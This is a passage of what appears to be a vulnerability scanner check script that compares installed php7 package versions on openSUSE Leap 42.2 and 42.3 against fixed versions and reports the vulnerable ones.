rpm:\"php7-ftp~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-ftp-debuginfo\", rpm:\"php7-ftp-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-gd\", rpm:\"php7-gd~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-gd-debuginfo\", rpm:\"php7-gd-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-gettext\", rpm:\"php7-gettext~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-gettext-debuginfo\", rpm:\"php7-gettext-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-gmp\", rpm:\"php7-gmp~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-gmp-debuginfo\", rpm:\"php7-gmp-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-iconv\", rpm:\"php7-iconv~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-iconv-debuginfo\", rpm:\"php7-iconv-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-imap\", rpm:\"php7-imap~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-imap-debuginfo\", rpm:\"php7-imap-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-intl\", rpm:\"php7-intl~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-intl-debuginfo\", rpm:\"php7-intl-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-json\", rpm:\"php7-json~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-json-debuginfo\", rpm:\"php7-json-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-ldap\", rpm:\"php7-ldap~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-ldap-debuginfo\", rpm:\"php7-ldap-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-mbstring\", rpm:\"php7-mbstring~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-mbstring-debuginfo\", rpm:\"php7-mbstring-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-mcrypt\", rpm:\"php7-mcrypt~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-mcrypt-debuginfo\", rpm:\"php7-mcrypt-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-mysql\", rpm:\"php7-mysql~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-mysql-debuginfo\", rpm:\"php7-mysql-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-odbc\", rpm:\"php7-odbc~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-odbc-debuginfo\", rpm:\"php7-odbc-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-opcache\", rpm:\"php7-opcache~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-opcache-debuginfo\", rpm:\"php7-opcache-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-openssl\", rpm:\"php7-openssl~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-openssl-debuginfo\", rpm:\"php7-openssl-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pcntl\", rpm:\"php7-pcntl~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pcntl-debuginfo\", rpm:\"php7-pcntl-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pdo\", rpm:\"php7-pdo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pdo-debuginfo\", rpm:\"php7-pdo-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pgsql\", rpm:\"php7-pgsql~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pgsql-debuginfo\", rpm:\"php7-pgsql-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-phar\", rpm:\"php7-phar~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-phar-debuginfo\", rpm:\"php7-phar-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-posix\", rpm:\"php7-posix~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-posix-debuginfo\", rpm:\"php7-posix-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pspell\", rpm:\"php7-pspell~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pspell-debuginfo\", rpm:\"php7-pspell-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-readline\", rpm:\"php7-readline~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-readline-debuginfo\", rpm:\"php7-readline-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-shmop\", rpm:\"php7-shmop~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-shmop-debuginfo\", rpm:\"php7-shmop-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-snmp\", rpm:\"php7-snmp~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-snmp-debuginfo\", rpm:\"php7-snmp-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-soap\", rpm:\"php7-soap~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-soap-debuginfo\", rpm:\"php7-soap-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sockets\", rpm:\"php7-sockets~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sockets-debuginfo\", rpm:\"php7-sockets-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sqlite\", rpm:\"php7-sqlite~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sqlite-debuginfo\", rpm:\"php7-sqlite-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sysvmsg\", rpm:\"php7-sysvmsg~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sysvmsg-debuginfo\", rpm:\"php7-sysvmsg-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sysvsem\", rpm:\"php7-sysvsem~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sysvsem-debuginfo\", rpm:\"php7-sysvsem-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sysvshm\", rpm:\"php7-sysvshm~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sysvshm-debuginfo\", rpm:\"php7-sysvshm-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-tidy\", rpm:\"php7-tidy~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-tidy-debuginfo\", rpm:\"php7-tidy-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-tokenizer\", rpm:\"php7-tokenizer~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-tokenizer-debuginfo\", rpm:\"php7-tokenizer-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-wddx\", rpm:\"php7-wddx~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-wddx-debuginfo\", rpm:\"php7-wddx-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-xmlreader\", rpm:\"php7-xmlreader~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-xmlreader-debuginfo\", rpm:\"php7-xmlreader-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-xmlrpc\", rpm:\"php7-xmlrpc~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-xmlrpc-debuginfo\", rpm:\"php7-xmlrpc-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-xmlwriter\", rpm:\"php7-xmlwriter~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-xmlwriter-debuginfo\", rpm:\"php7-xmlwriter-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-xsl\", rpm:\"php7-xsl~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-xsl-debuginfo\", rpm:\"php7-xsl-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-zip\", rpm:\"php7-zip~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-zip-debuginfo\", rpm:\"php7-zip-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-zlib\", rpm:\"php7-zlib~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-zlib-debuginfo\", rpm:\"php7-zlib-debuginfo~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pear\", rpm:\"php7-pear~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pear-Archive_Tar\", rpm:\"php7-pear-Archive_Tar~7.0.7~14.9.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"apache2-mod_php7\", rpm:\"apache2-mod_php7~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"apache2-mod_php7-debuginfo\", rpm:\"apache2-mod_php7-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7\", rpm:\"php7~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-bcmath\", rpm:\"php7-bcmath~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-bcmath-debuginfo\", rpm:\"php7-bcmath-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-bz2\", rpm:\"php7-bz2~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-bz2-debuginfo\", rpm:\"php7-bz2-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-calendar\", rpm:\"php7-calendar~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-calendar-debuginfo\", rpm:\"php7-calendar-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-ctype\", rpm:\"php7-ctype~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-ctype-debuginfo\", rpm:\"php7-ctype-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-curl\", rpm:\"php7-curl~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-curl-debuginfo\", rpm:\"php7-curl-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-dba\", rpm:\"php7-dba~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-dba-debuginfo\", rpm:\"php7-dba-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-debuginfo\", rpm:\"php7-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-debugsource\", rpm:\"php7-debugsource~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-devel\", rpm:\"php7-devel~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-dom\", rpm:\"php7-dom~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-dom-debuginfo\", rpm:\"php7-dom-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-enchant\", rpm:\"php7-enchant~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-enchant-debuginfo\", rpm:\"php7-enchant-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-exif\", rpm:\"php7-exif~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-exif-debuginfo\", rpm:\"php7-exif-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-fastcgi\", rpm:\"php7-fastcgi~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-fastcgi-debuginfo\", rpm:\"php7-fastcgi-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-fileinfo\", rpm:\"php7-fileinfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-fileinfo-debuginfo\", rpm:\"php7-fileinfo-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-firebird\", rpm:\"php7-firebird~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-firebird-debuginfo\", rpm:\"php7-firebird-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-fpm\", rpm:\"php7-fpm~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-fpm-debuginfo\", rpm:\"php7-fpm-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-ftp\", rpm:\"php7-ftp~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-ftp-debuginfo\", rpm:\"php7-ftp-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-gd\", rpm:\"php7-gd~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-gd-debuginfo\", rpm:\"php7-gd-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-gettext\", rpm:\"php7-gettext~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-gettext-debuginfo\", rpm:\"php7-gettext-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-gmp\", rpm:\"php7-gmp~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-gmp-debuginfo\", rpm:\"php7-gmp-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-iconv\", rpm:\"php7-iconv~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-iconv-debuginfo\", rpm:\"php7-iconv-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-imap\", rpm:\"php7-imap~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-imap-debuginfo\", rpm:\"php7-imap-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-intl\", rpm:\"php7-intl~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-intl-debuginfo\", rpm:\"php7-intl-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-json\", rpm:\"php7-json~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-json-debuginfo\", rpm:\"php7-json-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-ldap\", rpm:\"php7-ldap~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-ldap-debuginfo\", rpm:\"php7-ldap-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-mbstring\", rpm:\"php7-mbstring~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-mbstring-debuginfo\", rpm:\"php7-mbstring-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-mcrypt\", rpm:\"php7-mcrypt~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-mcrypt-debuginfo\", rpm:\"php7-mcrypt-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-mysql\", rpm:\"php7-mysql~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-mysql-debuginfo\", rpm:\"php7-mysql-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-odbc\", rpm:\"php7-odbc~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-odbc-debuginfo\", rpm:\"php7-odbc-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-opcache\", rpm:\"php7-opcache~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-opcache-debuginfo\", rpm:\"php7-opcache-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-openssl\", rpm:\"php7-openssl~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-openssl-debuginfo\", rpm:\"php7-openssl-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pcntl\", rpm:\"php7-pcntl~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pcntl-debuginfo\", rpm:\"php7-pcntl-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pdo\", rpm:\"php7-pdo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pdo-debuginfo\", rpm:\"php7-pdo-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pgsql\", rpm:\"php7-pgsql~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pgsql-debuginfo\", rpm:\"php7-pgsql-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-phar\", rpm:\"php7-phar~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-phar-debuginfo\", rpm:\"php7-phar-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-posix\", rpm:\"php7-posix~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-posix-debuginfo\", rpm:\"php7-posix-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pspell\", rpm:\"php7-pspell~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pspell-debuginfo\", rpm:\"php7-pspell-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-readline\", rpm:\"php7-readline~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-readline-debuginfo\", rpm:\"php7-readline-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-shmop\", rpm:\"php7-shmop~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = 